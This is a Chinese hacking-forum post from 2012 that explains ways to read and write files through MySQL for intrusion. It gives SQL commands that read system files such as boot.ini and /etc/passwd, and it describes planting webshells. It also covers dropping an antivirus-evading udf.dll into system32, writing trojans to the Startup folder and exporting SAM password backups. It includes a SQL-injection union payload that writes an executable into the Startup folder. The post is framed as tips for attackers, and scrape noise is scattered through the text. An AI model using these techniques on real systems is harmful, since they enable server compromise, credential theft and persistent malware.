找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 mysql下读取文件的几种方式
返回列表 发新帖
查看: 2869|回复: 0
打印 上一主题 下一主题

mysql下读取文件的几种方式

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-13 16:34:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
今天朋友问我如何在mysql下读取文件,把我问愣了,发现自己还是犯了不求甚解的毛病,因此特地查了下mysql使用手册。
# m$ `: V  d- d  g思路都一样,在拥有file权限的前提下,读取文件为字符串形式插入表中,然后读出表中数据,只是方式略有不同
3 S, \8 A8 g: j  w: D8 G# x  {* [' n1 X5 F% h' K' N
mysql3.x下   b0 Z7 ?5 t; `: K9 ~: a
. z7 o' H0 z) L5 U9 x7 g) C- H
不确定mysql3.x下能否使用load_file()函数(我在mysql3使用手册上没有查到,但貌似是可以的),用 load data infile 读取文件,命令如下 * d& e+ z" Q; @" W: `7 T" L

1 W/ a, ^& B3 I( \2 D  J. o# Qmysql>create table a (cmd text);
+ {0 I  T9 T; ^mysql>load data infile 'c:\\boot.ini' into table a; 4 {) u* ^# @; J, `: }9 K
mysql>select * from a; 7 s% K' ^" J0 }' V0 Y$ b  L

; o7 U; c4 n5 s. A, ]mysql4.x下 0 ?6 m! P+ O$ U0 D9 @
  o+ x: c/ @1 F2 N- Q# X# A
mysql4.x下除了 load data infile 外还可以用大家熟知的 load_file() 来读取,命令如下 5 m$ M7 ?; }5 ^% H; F- U- k

" A6 {5 M6 ^& Y# R, m9 qmysql>create table a (cmd text);
8 L. |* Z) l  v$ Fmysql>insert into a (cmd) values (load_file('c:\\boot.ini'));
# K& v7 e" u* I. y: w' smysql>select * from a;
1 \4 R% w- W8 @; k8 r% ?$ J% N* _8 [5 m: p
mysql5.x下 ( L& J2 E. f+ Q) x
" U5 F* y# {. \2 D
在linux下,mysql5.x 除了上面两种方法,还可以利用 system 直接执行系统命令的方式来读取文件(是否必须root身份不确定,未测试),命令如下 3 h' |% L# F- Y6 ~6 k

1 C0 g: ^# i' _6 V; K9 y# Imysql>system cat /etc/passwd ( C) Y9 X, q/ ]- c4 t% i) T
/ ?; T# n- }; o

2 Q" @( w, w. C& d7 P; u1 _& Amysql下读取文件在入侵中用到的时候不多,可能用于查询配置文件寻找web路径,或者webshell权限很小的时候读取其他格式的webshell内容然后用into outfile方式写入大马等,二进制文件也可以这样用,只是多了hex()和unhex()的工序。 , y- l& l% d. {
: [! l( s% g7 z% [+ s) J7 G

- S* Q# g- y0 e* j( M例:把免杀过的udf.dll文件插入系统目录 6 \& I0 P( K- r7 ^* V
* S& f4 M2 |1 M" X% q
create table a (cmd LONGBLOB); ! K* r# w0 |  m) |2 {( l' H
insert into a (cmd) values (hex(load_file('c:\\windows\\temp\\udf.dll'))); ( o  W" p3 b- U0 ^
SELECT unhex(cmd) FROM a INTO DUMPFILE 'c:\\windows\\system32\\udf.dll';
5 Z" V/ [  L6 t7 x
& _& d$ b' K- w7 _其他的利用方法也很多,如把木马文件写入启动项,或者把加工过的cmd.exe文件导出到系统根目录下,把sam备份导出到可读目录等等,注入中应该也可以这样用(在不知道web路径又可以导出文件的情况下),大家自由发挥吧。 2 A$ J. h0 u2 A( p$ n6 H
) }- \* ?* j- `

# Z$ U  x% ]' A' O; @注入中的语法(未测试) 1 w& w: a  M% @

3 x* m7 A. L8 J
* b9 \  V9 N$ ?/ y: m1 W) uid=xxx and 1=2 union select 1,2,3,unhex(mm.exe的十六进制),5 INTO DUMPFILE 'C:\\Documents and Settings\\All Users\\「开始」菜单\程序\启动\\mm.exe'/*
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表